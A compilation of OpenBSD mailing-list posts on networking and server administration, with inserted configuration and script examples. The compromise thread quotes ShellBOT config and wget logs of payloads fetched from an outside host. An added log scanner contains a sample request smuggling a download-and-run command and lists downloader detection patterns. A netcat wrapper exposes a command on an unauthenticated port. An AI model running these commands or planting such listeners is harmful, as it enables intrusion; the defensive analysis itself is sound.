    15:25:02.061139 802.1d RSTP config flags=0x3c root=6011.0:18:74:61:e5:40 rootcost=0x0 bridge=6011.0:18:74:61:e5:40 port=0x8630 age=0/0 max=20/0 hello=2/0 fwdelay=15/0

I'm no coder either so I can't review your patch's quality, but it would be good to get it verified & in the tree. Thanks.

/Pete

On 29. okt. 2006, at 14.15, Stuart Henderson wrote:

On 2006/10/27 14:03, Pete Vickers wrote:
> A nice start could be to teach our tcpdump about RSTP. At present it just pukes:

something like this? (coding style probably sucks, but I'm no coder :)

    Index: print-stp.c
    ===
    RCS file: /data/cvsroot/OpenBSD/src/usr.sbin/tcpdump/print-stp.c,v
    retrieving revision 1.4
    diff -u -r1.4 print-stp.c
subversion with mod_dav_svn
Hi,

Anybody got subversion running well under OpenBSD with the http/webdav transport? It seems to require apache2 amongst a whole shed load of other dependencies. Google throws up nothing less than 4 years old, so I'm really just after any experiences to shortcut my legwork.

thanks
/Pete
Re: PCI-X not seen by 3.8 on HP DL-145 G2
On 9. des. 2005, at 10.01, Srebrenko Sehic wrote:
> 2) DL145 (G2), SATA/nForce4 = works, but the disk is slow and the CPU spends 100% of time in kernel with heavy disk activity. (tested on i386/3.8-STABLE)

For my DL145 (pretty new) I get a reasonable-ish disk I/O of ~60Mb/s (with CPU at 99% idle):

    [EMAIL PROTECTED] /root> dd if=/dev/rwd0a of=/dev/null bs=1m count=1000
    1000+0 records in
    1000+0 records out
    1048576000 bytes transferred in 17.645 secs (59423434 bytes/sec)
    [EMAIL PROTECTED] /root>

... since it's a 2xAMD64 CPU box I'm running amd64 GENERIC.MP (-current); the only problem I experienced was crashing on boot with ipmi. Once that was disabled, all is fine. (You wouldn't believe how fast this thing chews through the key gen on first boot :-)

    [EMAIL PROTECTED] /root> cat /var/run/dmesg.boot
    OpenBSD 3.8-current (GENERIC.MP) #0: Wed Nov 30 01:23:39 CET 2005
        [EMAIL PROTECTED]:/usr/src/sys/arch/amd64/compile/GENERIC.MP
    real mem = 2146140160 (2095840K)
    avail mem = 1835208704 (1792196K)
    using 22937 buffers containing 214822912 bytes (209788K) of memory
    mainbus0 (root)
    ipmi at mainbus0 not configured
    mainbus0: Intel MP Specification (Version 1.4) (AMD HAMMER )
    cpu0 at mainbus0: apid 0 (boot processor)
    cpu0: AMD Opteron(tm) Processor 252, 2612.35 MHz
    cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW
    cpu0: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB 64b/line 16-way L2 cache
    cpu0: ITLB 32 4KB entries fully associative, 8 4MB entries fully associative
    cpu0: DTLB 32 4KB entries fully associative, 8 4MB entries fully associative
    cpu0: apic clock running at 200925952Hz
    cpu1 at mainbus0: apid 1 (application processor)
    cpu1: AMD Opteron(tm) Processor 252, 2612.04 MHz
    cpu1: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW
    cpu1: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB 64b/line 16-way L2 cache
    cpu1: ITLB 32 4KB entries fully associative, 8 4MB entries fully associative
    cpu1: DTLB 32 4KB entries fully associative, 8 4MB entries fully associative
    mpbios: bus 0 is type PCI
    mpbios: bus 1 is type PCI
    mpbios: bus 2 is type PCI
    mpbios: bus 3 is type PCI
    mpbios: bus 4 is type PCI
    mpbios: bus 128 is type PCI
    mpbios: bus 129 is type PCI
    mpbios: bus 134 is type PCI
    mpbios: bus 139 is type ISA
    ioapic0 at mainbus0 apid 2: pa 0x8373cf24, version 11, 24 pins
    ioapic1 at mainbus0 apid 3: pa 0x8373ce24, version 11, 7 pins
    ioapic2 at mainbus0 apid 4: pa 0x8373cc24, version 11, 7 pins
    pci0 at mainbus0 bus 0: configuration mode 1
    "Nvidia nForce4 DDR" rev 0xa3 at pci0 dev 0 function 0 not configured
    pcib0 at pci0 dev 1 function 0 "Nvidia nForce4 ISA" rev 0xa3
    "Nvidia nForce4 SMBus" rev 0xa2 at pci0 dev 1 function 1 not configured
    ohci0 at pci0 dev 2 function 0 "Nvidia nForce4 USB" rev 0xa2: apic 2 int 10 (irq 10), version 1.0, legacy support
    usb0 at ohci0: USB revision 1.0
    uhub0 at usb0
    uhub0: Nvidia OHCI root hub, rev 1.00/1.00, addr 1
    uhub0: 4 ports with 4 removable, self powered
    ehci0 at pci0 dev 2 function 1 "Nvidia nForce4 USB" rev 0xa3: apic 2 int 11 (irq 11)
    ehci0: timed out waiting for BIOS
    usb1 at ehci0: USB revision 2.0
    uhub1 at usb1
    uhub1: Nvidia EHCI root hub, rev 2.00/1.00, addr 1
    uhub1: 4 ports with 4 removable, self powered
    pciide0 at pci0 dev 6 function 0 "Nvidia nForce4 IDE" rev 0xa2: DMA, channel 0 configured to compatibility, channel 1 configured to compatibility
    pciide0: channel 0 disabled (no drives)
    pciide0: channel 1 disabled (no drives)
    pciide1 at pci0 dev 8 function 0 "Nvidia nForce4 SATA 2" rev 0xa3: DMA
    pciide1: using apic 2 int 10 (irq 10) for native-PCI interrupt
    wd0 at pciide1 channel 0 drive 0:
    wd0: 16-sector PIO, LBA48, 76319MB, 156301488 sectors
    wd0(pciide1:0:0): using PIO mode 4, Ultra-DMA mode 5
    wd1 at pciide1 channel 1 drive 0:
    wd1: 16-sector PIO, LBA48, 238475MB, 488397168 sectors
    wd1(pciide1:1:0): using PIO mode 4, Ultra-DMA mode 5
    ppb0 at pci0 dev 9 function 0 "Nvidia nForce4 PCI-PCI" rev 0xa2
    pci1 at ppb0 bus 1
    vga1 at pci1 dev 5 function 0 "Nvidia GeForce2 MX" rev 0xb2
    wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
    wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
    ppb1 at pci0 dev 12 function 0 "Nvidia nForce4 PCIE" rev 0xa3
    pci2 at ppb1 bus 2
    bge0 at pci2 dev 0 function 0 "Broadcom BCM5721" rev 0x11, BCM5750 B1 (0x4101): apic 2 int 11 (irq 11), address 00:15:60:5f:93:49
    brgphy0 at bge0 phy 1: BCM5750 10/100/1000baseT PHY, rev. 0
    ppb2 at pci0 dev 13 function 0 "Nvidia nForce4 PCIE" rev 0xa3
    pci3 at ppb2 bus 3
    bge1 at pci3 dev 0 function 0 "Broadcom BCM5721" rev 0x11, BCM5750 B1 (0x4101): apic 2 int 10 (irq 10), address 00:15:60:5f:93:48
    brgphy1 at bge1 phy 1: BCM5750 10/100/1000baseT PHY, rev. 0
    ppb3 at pci0 dev 14 function 0 "Nvidia nForce4 PCIE" rev 0xa3
    pci4 at ppb3 bu
Re: PCI-X not seen by 3.8 on HP DL-145 G2
On 9. des. 2005, at 11.33, Srebrenko Sehic wrote:

On 12/9/05, Pete Vickers <[EMAIL PROTECTED]> wrote:
> For my DL145 (pretty new) I get a reasonable-ish disk I/O of ~60Mb/s (with CPU at 99% idle):
>
>     [EMAIL PROTECTED] /root> dd if=/dev/rwd0a of=/dev/null bs=1m count=1000
>     1000+0 records in
>     1000+0 records out
>     1048576000 bytes transferred in 17.645 secs (59423434 bytes/sec)
>     [EMAIL PROTECTED] /root>

Try testing read/write into files instead of the raw device. Also, try with smaller block sizes. I bet you will see different results.

Yeah, this is pretty poor but consistent (but cpu use is still negligible):

    [EMAIL PROTECTED] /tmp> dd if=/dev/zero of=junk.data bs=1m count=500
    500+0 records in
    500+0 records out
    524288000 bytes transferred in 68.774 secs (7623327 bytes/sec)
    [EMAIL PROTECTED] /tmp>
    [EMAIL PROTECTED] /tmp> dd if=/dev/zero of=junk.data bs=512k count=1000
    1000+0 records in
    1000+0 records out
    524288000 bytes transferred in 68.576 secs (7645311 bytes/sec)
    [EMAIL PROTECTED] /tmp>
LSI 300-8x problems
Hi all,

Having read the list archives, the decision was made to get a 300-8x for a new server I'm putting together. However, I'm having 2 distinct problems.

First of all, the card is only detected when pcibios is disabled. The second is that during the installation process, the disklabels are written, but the install then "hangs" just after asking for confirmation to delete all data on the partitions. If left for a while, "ami0: timeout ccb 126" is printed several times.

This has been tried both with the original firmware (LSI_FW_813F) and with the latest firmware (LSI_FW_813J). There is a slew of dmesgs available (see the links below): with the new and old firmware, and with and without pcibios enabled. The motherboard is an Intel 925 chipset part.

Motherboard information: http://www.intel.com/design/servers/boards/SE7221BK1-E/index.htm
Dmesgs: http://midworld.co.uk/~dmesg/

Basically, has anyone got any ideas of how to get this thing working?

Thanks for any help

Pete
Re: dhcpd and static entries
On 12. des. 2005, at 21.22, Peter Hessler wrote: This is with -current dhcpd within the last month. On Mon, 12 Dec 2005 12:15:37 -0800 Peter Hessler <[EMAIL PROTECTED]> wrote: : I have a dhcp'd network, with static entries for a ton of machines. : The problem is that the range is for .10 - .254, and the static : entries are scattered throughout. When a random client requests an : address, dhcpd will give out a staticly defined entry. So when the : static entry machine comes back, the two machines fight each other : for the address. : : Moving the static entries to outside the range is unfeasable right : now. And it doesn't address the issue of 'machine was on a different : dhcp network with an address that happens to be staticly defined on : ours'. : : Why does dhcpd give out addresses that are currently in use, and why : does it give out staticly defined addresses? Shouldn't it remove the : static entries from the dynamic pool? : : : Sanitized portions of config: : : shared-network LOCAL-NET { : option domain-name "example.com"; : option domain-name-servers 10.0.0.1; : : option nis-domain "example.nis"; : option nis-servers nis.example.com; : option ntp-servers ntp.example.com; : option time-offset -28800; # PST : : subnet 10.0.0.0 netmask 255.255.255.0 { : option routers 10.0.0.1; : : range 10.0.0.10 10.0.0.254; : } : : group { : use-host-decl-names on; : # host1.example.com 10.0.0.15 :host host1.example.com { hardware ethernet \ : 00:0f:1f:f7:7d:64; fixed-address host1.example.com; } : # host2.example.com 10.0.0.20 : host host2.example.com { hardware ethernet \ : 02:A0:98:01:F5:B4; fixed-address host2.example.com; } : # host3.example.com 10.0.0.29 : host host3.example.com { hardware ethernet \ : 00:0F:1F:F7:78:B6; fixed- address host3.example.com; } :} : } : I believe OpenBSD's dhcpd is based on ISC's implementation, in which case: static entries are in the global scope and independent of any pool declaration. 
The error is one of configuration: you've defined static entries and a dynamic pool that overlap, i.e. you've told it to use the IP addresses twice. At a pinch, the ping-check option might help you out if your address space utilisation is not too large. /Pete
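Added example (not from the thread, and not Pete's or Peter's configuration): the overlapping layout quoted above beside one way to fix it that leaves every static host at its current address. dhcpd accepts more than one range statement per subnet, so the dynamic pool can be carved around the fixed addresses. ISC/OpenBSD dhcpd.conf syntax; the addresses and MACs are the ones quoted in the post, everything else is an assumption.

```conf
# BEFORE (as posted): the dynamic range .10-.254 contains the fixed
# addresses .15, .20 and .29, so dhcpd may lease those to random clients.
subnet 10.0.0.0 netmask 255.255.255.0 {
        option routers 10.0.0.1;
        range 10.0.0.10 10.0.0.254;
}

# AFTER: same subnet, same hosts; the pool is split so that no range
# includes a fixed address. Nothing has to move.
subnet 10.0.0.0 netmask 255.255.255.0 {
        option routers 10.0.0.1;
        range 10.0.0.10 10.0.0.14;
        range 10.0.0.16 10.0.0.19;
        range 10.0.0.21 10.0.0.28;
        range 10.0.0.30 10.0.0.254;
}

group {
        use-host-decl-names on;
        # fixed-address given as a literal IP: the server then does not
        # depend on a DNS lookup of the hostname at lease time
        host host1.example.com { hardware ethernet 00:0f:1f:f7:7d:64; fixed-address 10.0.0.15; }
        host host2.example.com { hardware ethernet 02:A0:98:01:F5:B4; fixed-address 10.0.0.20; }
        host host3.example.com { hardware ethernet 00:0F:1F:F7:78:B6; fixed-address 10.0.0.29; }
}
```

The second problem in the post (a client arriving with a lease from another network that collides with a local static) is not solved by this; the pool split only stops dhcpd itself from handing out the static addresses.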
Re: Just confirming: no way to do a pf rdr based on hostname?
On 12. des. 2005, at 22.44, Peter Landry wrote: Hi All, We're migrating an old Microsoft ISA Server system to OpenBSD pf. First off, before I ask any questions, kudos to everyone -- Installing OpenBSD 3.8 was a very pleasant, painless experience for someone who's never used it before. Setting up pf/nat was also extraordinarily easy. The docs are great. That aside, the only thing that I haven't been able to migrate yet is ISA's ability to redirect web requests coming in on the same IP to different machines based on the host name. IE- www.a.com (IP 123.123.0.1) gets redirected to the internal IP 192.168.0.1 while www.b.com (also IP 123.123.0.1) gets redirected to the internal IP 192.168.0.2. I haven't found anything in the docs, and all the list archive questions I've found were specific to ipnat, not pf. I'm thinking that I can't do it. In that case, my options seem to be 1) use different external IP's for each website, and redirect to different internal servers based on IP 2) redirect all web traffic to the legacy ISA system, which will then redirect based on hostname. I'm hesitant to use up all our IPs for option 1, but I'm thinking option 2 is even worse... Are there any options I haven't thought of? Thanks for any advice... Peter L. You need to examine such http requests at the application layer to 'route' them; I'd take a look at reverse proxying with either apache (in the base system) or squid in the packages. Either of those should be able to listen on your firewall's external interface, and forward http requests inbound based on the HTTP/1.1 hostnames within the requests. /Pete
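Added example of the reverse-proxy approach (not from the thread). pf's rdr works on layer 3/4 and never sees the Host: header, so the name-based split has to happen in a proxy that terminates the connection on the firewall. This uses Apache 2.4 mod_proxy syntax; the Apache 1.3 in 3.8's base has the same ProxyPass/ProxyPassReverse directives but additionally needs NameVirtualHost 123.123.0.1:80. The public and internal addresses are the ones from the question; the server names, the default vhost and the pf rule are assumptions.

```conf
# /etc/httpd.conf (Apache 2.4, mod_proxy + mod_proxy_http loaded)
Listen 123.123.0.1:80
ProxyRequests Off          # reverse proxy only: never act as an open forward proxy
ProxyPreserveHost On       # hand the client's Host: header to the backend unchanged

# The first name-based vhost is the default. Requests whose Host: matches
# neither site land here and are refused instead of being proxied somewhere.
<VirtualHost 123.123.0.1:80>
        ServerName default.invalid
        <Location />
                Require all denied
        </Location>
</VirtualHost>

<VirtualHost 123.123.0.1:80>
        ServerName www.a.com
        ProxyPass        / http://192.168.0.1/
        ProxyPassReverse / http://192.168.0.1/
</VirtualHost>

<VirtualHost 123.123.0.1:80>
        ServerName www.b.com
        ProxyPass        / http://192.168.0.2/
        ProxyPassReverse / http://192.168.0.2/
</VirtualHost>

# /etc/pf.conf: no rdr any more; port 80 on the public address terminates
# on the firewall itself, so it only has to be allowed in
pass in on egress proto tcp to 123.123.0.1 port 80
```

ProxyPassReverse rewrites Location: headers in redirects issued by the backends, so a 302 to http://192.168.0.1/login does not leak the internal address to the client.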
Re: pf question
Better (IMHO) to use bgpd to suck down the 'bogon' prefixes, and then tag them for pf, see example here: http://www.cymru.com/BGP/bogon-rs.html /Pete
On 29. des. 2005, at 18.32, eric wrote: On Thu, 2005-12-29 at 11:38:22 -0500, Dave Feustel proclaimed... Has anyone on the list experience with using pf to block ip addresses in the iana reserved ip address ranges list? I don't think any of us have ever thought of that. Oh wait..I may have... run this out of cron weekly
#!/bin/sh
#; $Id: gbogl.sh,v 1.3 2005/01/28 04:47:16 epancer Exp $
#; a small tool to grab bogon list from team cymru
#;
PATH="/usr/bin:/bin:/usr/sbin:/sbin"
BOGONFILE="/etc/bogon.txt"
BOGONURL="http://www.cymru.com/Documents/bogon-bn-nonagg.txt"
TMPFILE="${BOGONFILE}.tmp.$$"
PFTABLE="bogons"        # pf table name; the original's <...> was eaten by the archive

checkfile () {
    if [ ! -f "$BOGONFILE" ]; then
        echo "! $BOGONFILE must exist, exiting."
        exit 2
    fi
}

getnewfile () {
    # fetch into a temp file first: a failed download must not
    # overwrite the working list with an empty file
    if ! lynx -dump "$BOGONURL" > "$TMPFILE" || [ ! -s "$TMPFILE" ]; then
        rm -f "$TMPFILE"
        echo "! fetch of $BOGONURL failed, keeping old $BOGONFILE"
        exit 1
    fi
    mv "$TMPFILE" "$BOGONFILE"
}

fixperm () {
    chmod 644 "$BOGONFILE"
}

reloadtable () {
    # pf only reads the file when the ruleset is loaded; push the
    # new list into the running table so the weekly update takes effect
    pfctl -t "$PFTABLE" -T replace -f "$BOGONFILE"
}

logmsg () {
    logger -p kern.notice "rewrote $BOGONFILE"
}

checkfile
getnewfile
fixperm
reloadtable
logmsg
exit 0
Then... table <bogons> persist file "/etc/bogon.txt" Somewhere in your pf.conf.
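Added example of the bgpd route (not from the thread; neither Pete's nor Cymru's configuration): instead of a cron job rewriting a file, OpenBGPD peers with the Team Cymru bogon route server and writes every prefix it learns straight into a pf table with set pftable. OpenBSD 6.4 or later bgpd.conf syntax (older releases spell the "announce nothing" part as announce none). The peer address, both AS numbers, the router-id and the password are placeholders; the real values come from Cymru when peering is requested.

```conf
# --- /etc/bgpd.conf ---
AS 65000                        # placeholder: your own AS
router-id 192.0.2.1
fib-update no                   # bogon prefixes must never become kernel routes,
                                # we only want them in the pf table

rs="192.0.2.254"                # placeholder: Cymru bogon route server address

neighbor $rs {
        remote-as 65333         # placeholder: route server AS
        descr "cymru-bogon-rs"
        multihop 64
        announce IPv4 unicast
        export none             # we announce nothing to the route server
        tcp md5sig password "placeholder"
}

# filter rules: the last matching rule wins. Refuse everything, then
# accept only what the route server sends and tag it into pf's <bogons>.
deny from any
allow from $rs set pftable "bogons"

# --- /etc/pf.conf ---
# the table has to exist (persist) so bgpd can fill it at runtime
table <bogons> persist
block in  quick on egress from <bogons> to any
block out quick on egress from any to <bogons>
```

Check it is working with bgpctl show neighbor $rs (state Established) and pfctl -t bogons -T show; the table should fill within seconds of the session coming up. Because the entries are tied to the BGP session, a withdrawal from Cymru removes the prefix from the table, which is the point of preferring this over a weekly file.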
Re: How did they get here?
Hi, Standard advice is to reinstall the o/s (3.8 ? ;-) and then _data_ only from known good backup. You could use a boot cdrom & dd off an image of the disk for later analysis if you want first. Is there some attack vector like php or such available on the machine ? maybe they used that to retrieve & write the file ? ... but access to /tmp is tricky from a chrooted httpd ! /Pete On 4. jan. 2006, at 15.50, Gaby vanhegan wrote: To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386. I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are: ### Microsoft Search Worm - by br0k3d ### # From the same author of LinuxDay Worm and other variants ### And: # ShellBOT # 0ldW0lf - [EMAIL PROTECTED] # - www.atrix-br.cjb.net # - www.atrix.cjb.net in /tmp/.cpanel and /tmp/.cpanel.tmp. Reading them through, they just look like IRC clients written in Perl that have some remote commands for DOS, and the likes. They connect to a chatroom and print some message or other. If anybody wants to have some fun, the main config block is: # IRC my @adms=("darkwoot", "br0k3d", "vipzen", "Nandokabala"); #nick dos administradores my @canais=("#gestapo"); my $nick='ADOLFHITLER'; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final my $ircname = 'SSSA'; chop (my $realname = `uname -a`); $servidor='irc.agitamanaus.net' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento my $porta='6667'; #porta do servidor d irc My question is how did these files get into the machine. I have entries in the httpd error log that look like this: --05:10:47-- http://arnold.dvclub.com.hk/phpBB2/linuxday.txt => `/tmp/.cpanel' Resolving arnold.dvclub.com.hk... done. Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected. HTTP request sent, awaiting response... 
--05:10:57-- http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt => `/tmp/.cpanel.tmp' Resolving arnold.dvclub.com.hk... done. Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed: Connection timed out. Retrying. --05:12:13-- http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt (try: 2) => `/tmp/.cpanel.tmp' Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK Length: 3,355 [text/plain] 0K ... 100% 468.05 KB/s 05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355] So something is clearly injecting a command into a script, and it is causing wget to run and fetch some files. There are more instances of the same thing, but they're all fetching a file from the same place (either .cpanel, .cpanel.tmp or .plesk). Because they're in the default Apache error log, the attacker must have hit a website on the machine that doesn't have an ErrorLog defined, or they hit the machine by IP instead of a hostname. I got a list of sites that have no error log (and would log to /var/www/logs/error_log) and checked their transfer logs. None of them had any entries in them that correspond to any of the times on the wget entries, so I learn nothing from this. There are earlier entries as well, doing the same thing, but to a different site I'm going to do a bulk grep on all the web server logs to see if anything about wget turns up in any of them, and if I can then work out which script on which site is causing the problem. As far as I can tell, there is no damage, but there are some entries like these in the error logs: /tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A<80><80>^44: not found /tmp/x44423[2]: 1?X<89>?<8D>T<81>^DP<83>??RQ??^A?: not found /tmp/x44423[4]: syntax error: `(' unexpected Am I right in thinking that these entries show somebody trying to run a Linux binary unsuccessfully? Good job I leave Linux emulation turned off... :) So, what's my next move? 
My daily/weekly security emails show nothing to be worried about, no changes to any system critical files or anything of that ilk. Where can I look for more information or clues? I know the machine is due for an upgrade, and that's next on my list. I would provide a dmesg but the machine has been up for a while with one full disk, so it's been pushed out of the end of the dmesg file. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
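Added example for the "bulk grep of the web server logs" step above (not from the thread; nothing here is Gaby's or Pete's code). A plain grep for "wget" misses the usual case, where the payload arrives percent-encoded in a query string, so the script below percent-decodes each request line first and then looks for the indicators that fit the evidence in the post: a downloader being invoked, files dropped under /tmp, shell command separators, and a URL passed as a parameter value (remote file inclusion). The four log lines are constructed for this example, not real log data, and the patterns are triage heuristics, not proof of compromise.

```sh
#!/bin/sh
# scan_access_log.sh: find the web requests that make httpd spawn wget.
# Works on Apache common/combined log format read from stdin.

# Constructed sample (invented for this example). Lines 1 and 2 are the
# kind of request that should be flagged; lines 3 and 4 are benign.
SAMPLE_LOG='203.0.113.5 - - [04/Jan/2006:05:10:47 +0000] "GET /index.php?page=http://203.0.113.9/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [04/Jan/2006:05:10:47 +0000] "GET /cgi-bin/stats.cgi?dir=|wget%20http://203.0.113.9/linuxday.txt%20-O%20/tmp/.cpanel;perl%20/tmp/.cpanel| HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
198.51.100.7 - - [04/Jan/2006:05:11:02 +0000] "GET /images/logo.png HTTP/1.1" 200 4096 "http://www.example.com/" "Mozilla/5.0"
198.51.100.8 - - [04/Jan/2006:05:11:30 +0000] "POST /forum/posting.php HTTP/1.1" 200 2048 "http://www.example.com/forum/" "Mozilla/5.0"'

# scan_log: read log lines on stdin; for each line whose percent-decoded
# request matches an indicator, print "client [timestamp] decoded-request".
scan_log() {
    awk '
    function hexval(c) { return index("0123456789ABCDEF", toupper(c)) - 1 }
    # percent-decode so that %20 %3B %7C and friends cannot hide the payload
    function urldecode(s,    out, c, h1, h2) {
        out = ""
        while (length(s) > 0) {
            c = substr(s, 1, 1)
            if (c == "%" && length(s) >= 3) {
                h1 = hexval(substr(s, 2, 1)); h2 = hexval(substr(s, 3, 1))
                if (h1 >= 0 && h2 >= 0) {
                    out = out sprintf("%c", h1 * 16 + h2)
                    s = substr(s, 4)
                    continue
                }
            }
            if (c == "+") c = " "
            out = out c
            s = substr(s, 2)
        }
        return out
    }
    {
        n = split($0, q, "\"")        # q[2] is the quoted request line
        if (n < 2) next
        req = urldecode(q[2])
        hit = 0
        if (req ~ /(^|[^a-zA-Z])(wget|curl|fetch|lynx|ftp) /) hit = 1  # downloader invoked
        if (req ~ /\/tmp\//)                                    hit = 1  # files dropped in /tmp
        if (req ~ /[;|`]/)                                      hit = 1  # shell command separators
        if (req ~ /[?&][^ =&]*=(https?|ftp):\/\//)              hit = 1  # URL as a parameter value
        if (hit) print $1, $4 " " $5, req
    }'
}

# stand-alone run over the constructed sample
printf '%s\n' "$SAMPLE_LOG" | scan_log
```

Run it over the real logs with cat /var/www/logs/*access_log | scan_log, then match the client addresses and timestamps it prints against the wget entries in error_log; the request line that lines up names the vulnerable script and the site it belongs to.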
netcat man page: -e emulation
Hi, The traditional netcat had a -e option to "Execute the specified command, using data from the network for stdin, and sending stdout and stderr to the network..." Whilst I can understand that this option might not be desirable to be included in the binary (for security reasons?), I occasionally find it very useful, and so emulate it with a shell script:
$ cat wetcat
#!/bin/ksh
# emulate netcat's -e: the first client to connect to LISTEN_PORT gets
# CMD's stdin/stdout/stderr. There is no authentication, so anyone who
# can reach the port can drive CMD; listen only where that is acceptable.
CMD="$*"
LISTEN_PORT=1234
# mktemp gives an unpredictable name, and mkfifo fails instead of
# following anything an attacker pre-created at that path
FIFO=$(mktemp -u /tmp/wetcat.XXXXXXXXXX) || exit 1
trap 'rm -f "$FIFO"' EXIT INT TERM
mkfifo -m 600 "$FIFO" || exit 1
# CMD reads what nc received (via the FIFO); CMD's output feeds nc's stdin
($CMD < "$FIFO") 2>&1 | nc -l "$LISTEN_PORT" > "$FIFO"
If others would find it useful too, maybe it could be added to the examples section of the nc(1) man page ? /Pete
Re: Temperature
Hi, While we're on this subject, what about adding something like " sysctl -w | grep hw.sensor" to /etc/daily ? I'd consider the output of such to be as useful as the status of disk space etc. /Pete On 15. jan. 2006, at 16.25, Stuart Henderson wrote: On 2006/01/15 13:05, Ricardo Lucas wrote: anyone knows a program that monitoring the cpu temperature and hard disk temperature sysctl(8) (hw.sensors tree) is the natural place for this information, you can be alerted if it exceeds parameters with sensorsd(8). Sensors for many motherboards and SCSI safte(4) enclosures are monitored here. SMART-capable ATA drives can be monitored with atactl(8), but you will probably need further processing to get actual temperatures. rotation?! hard disk rotation - don't think so. fan rotation - hw.sensors again.
3.9beta on macppc snapshot 30-01-06: no keyboard
Hi, on my powerbook5,2 (G4 15"), runs through booting fine, but at the install,upgrade,shell prompt, the keyboard doesn't work ( but still lights the LED) dmesg is thus a little tricky to acquire... /Pete
Re: 3.9beta on macppc snapshot 30-01-06: no keyboard
01488 sectors wd0(wdc1:0:0): using PIO mode 4, DMA mode 2, Ultra-DMA mode 5 "Apple UniNorth Firewire" rev 0x81 at pci2 dev 14 function 0 not configured gem0 at pci2 dev 15 function 0 "Apple Uni-N2 GMAC" rev 0x80: irq 41, address 00:0a:95:cd:87:c4 eephy0 at gem0 phy 0: Marvell 88E Gigabit PHY, rev. 1 rd0: fixed, 8192 blocks uhidev0 at uhub2 port 1 configuration 1 interface 0 uhidev0: vendor 0x05ac product 0x1000, rev 2.00/15.86, addr 2, iclass 3/1 ukbd0 at uhidev0 wskbd0 at ukbd0: console keyboard, using wsdisplay0 uhidev1 at uhub2 port 1 configuration 1 interface 1 uhidev1: vendor 0x05ac product 0x1000, rev 2.00/15.86, addr 2, iclass 3/1 uhid0 at uhidev1: input=3, output=0, feature=1 bootpath: '/[EMAIL PROTECTED]/[EMAIL PROTECTED]/[EMAIL PROTECTED]/[EMAIL PROTECTED]/3.9/macppc/bsd.rd' rootdev=0x1100 rrootdev=0x1100 rawdev=0x1102 WARNING: clock gained 6 days -- CHECK AND RESET THE DATE! uhidev2 at uhub4 port 1 configuration 1 interface 0 uhidev2: Chicony USB Keyboard, rev 1.10/1.00, addr 2, iclass 3/1 ukbd1 at uhidev2 wskbd1 at ukbd1 mux 1 wskbd1: connecting to wsdisplay0 uhidev3 at uhub4 port 1 configuration 1 interface 1 uhidev3: Chicony USB Keyboard, rev 1.10/1.00, addr 2, iclass 3/1 uhid1 at uhidev3: input=4, output=0, feature=0 ural0 at uhub5 port 1 ural0: Ralink 802.11g WLAN + Pen Drive, rev 2.00/0.01, addr 2 ural0: MAC/BBP RT2570 (rev 0x03), RF RT2526, address 00:0f:ea:61:5b:70 I'm willing to test kernels, but 'able' is questionable: currently whole HDD is HFS+ , so whilst .iso's are easiest to test, I'll try & do an install onto a USB disk to test kernels if necessary. /Pete On 6. feb. 2006, at 22.55, Miod Vallat wrote: on my powerbook5,2 (G4 15"), runs through booting fine, but at the install,upgrade,shell prompt, the keyboard doesn't work ( but still lights the LED) Can you try the latest snapshot (January 30th)? If the built-in keyboard still fails to work, can you plug an external USB keyboard to get the dmesg? 
And are you willing to test kernels if the problem still arises? Miod
OpenBGPD dropping sessions.
Hi I've got OpenBGPD running on 3.7, currently whenever I bring up a session with another peer the session drops to Idle as soon as a set of routes are learnt.
#macros
BD01="217.112.a.b"
AS 64513
router-id 85.234.132.65
neighbor $BD01 {
        remote-as 29550
        descr BD01
        multihop 3
        local-address 85.234.132.65
        announce none
}
deny from any prefix 10.0.0.0/8 prefixlen >= 8
deny from any prefix 172.16.0.0/12 prefixlen >= 12
deny from any prefix 192.168.0.0/16 prefixlen >= 16
deny from any prefix 169.254.0.0/16 prefixlen >= 16
deny from any prefix 192.0.2.0/24 prefixlen >= 24
deny from any prefix 224.0.0.0/4 prefixlen >= 4
deny from any prefix 240.0.0.0/4 prefixlen >= 4
The routes in particular are
Destination          Peer             Next-Hop         MED  ASPATH
*i84.92.0.0/15       195.66.224.164   195.66.224.164   90   6871
*i212.159.64.0/18    195.66.224.164   195.66.224.164   90   6871
*i87.115.0.0/16      195.66.224.164   195.66.224.164   90   6871
*i195.7.224.0/19     195.66.224.164   195.66.224.164   0    6871 8622 8622
*i87.114.0.0/16      195.66.224.164   195.66.224.164   90   6871
*i87.113.0.0/16      195.66.224.164   195.66.224.164   90   6871
*i87.112.0.0/16      195.66.224.164   195.66.224.164   90   6871
*i212.159.0.0/19     195.66.224.164   195.66.224.164   90   6871
*i212.159.32.0/19    195.66.224.164   195.66.224.164   90   6871
*i81.174.128.0/17    195.66.224.164   195.66.224.164   90   6871
*i212.56.64.0/18     195.66.224.164   195.66.224.164   90   6871
*i80.229.0.0/16      195.66.224.164   195.66.224.164   90   6871
*i212.84.96.0/19     195.66.224.164   195.66.224.164   0    6871 8622 8622
